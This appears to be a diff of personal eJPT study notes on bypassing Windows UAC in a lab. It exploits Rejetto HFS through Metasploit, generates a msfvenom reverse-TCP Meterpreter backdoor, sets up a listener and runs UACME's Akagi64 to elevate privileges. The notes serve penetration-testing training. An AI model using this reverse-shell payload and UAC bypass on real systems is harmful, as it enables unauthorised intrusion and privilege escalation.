Miss-ikky/Mywiki/EJPT/Host & Network Penetration Testing/1. System and hostbased attacks/Windows/Windows Vulnerabilities.md

 ---

 How to bypass UAC
+(part 1)
 - perform nmap scan on target
 - try to access webserver on target (port 80)
 - start up metasploit framework
 	- search rejetto
+			  Metasploit Framework that targets a vulnerability in the Rejetto HTTP File Server (HFS).
+HFS is a lightweight web server software used to share files and folders over HTTP.
 	- use exploit and set options
 	- perform basic local enumeration
 		- sysinfo
 		- pgrep explorer (to find processid for explorer.exe)
-		- migrate 2448 (we want to migrate to explorer session and get a 64bit meterpeter session)
+		- migrate 2448 (we want to migrate to explorer session and get a 64bit meterpeter session) -.
+It is important to match the architecture of the Meterpreter session with the target system to ensure compatibility and successful exploitation.
 		- sysinfo

-	- part 2
-		- pwd
-		- getuid
-		- getpr (to check that you still don't have privileges)
-		- cd C://
-		- mkdir Temp (best location for exploit code, don't upload to locations that are frequently accessed by users )
-		- cd temp
-		- upload backdoor.exe
-		- upload /root/Desktop/tools/UACME/Akagi64.exe
-		- right now we cannot execute these files with administrator privileges because UAC will prevent us so we need to Bypass uac
-	- .\Akagi64.exe 23 c:\Temp\\backdoor.exe
-		- now go back to listener
+	Part 1.1
-	- new tab in meterpeter
+	- In new window:
 		- Generate payload:  msfvenom -p windows/meterpreter/reverse_tcp LHOST=yourip LPORT=1234 -f exe > backdoor.exe
+	- In new msfconsole window:
 		- set up listernet with msfconsole (new metasploit session)
 			- set up multihandler to receive the connection once the payload is executed on the target
 			- use multi/handler
 			- set payload windows/meterpreter/revers_tcp
 			- set LHOST to kali ip and LPORT to 1234
-			- run and now go back to other meterpreter session (part 2)
+			- run and now go back to other meterpreter session **(part 2)**

-	- after running akigai you should see stage being sent
+		- (Part 3) after running akigai you should see stage being sent
 		- run sysinfo
 		- run getuid
 		- get privs (no you see you have elevated privileges even though you are an admin account and not administrator)
 			- ps (list process tree)
 				- you can migrate to any other services: migrate processid
 				- getuid

+	- **part 2**
+		- pwd
+		- getuid
+		- getprivs (to check that you still don't have privileges)
+		- cd C://
+		- mkdir Temp (best location for exploit code, don't upload to locations that are frequently accessed by users )
+		- cd temp
+		- upload backdoor.exe
+		- upload /root/Desktop/tools/UACME/Akagi64.exe
+		- right now we cannot execute these files with administrator privileges because UAC will prevent us so we need to Bypass uac
+	- \.\\Akagi64.exe 23 c:\Temp\\backdoor.exe
+		- now go back to listener (part 3)

 ![[Pasted image 20230705214848.png]]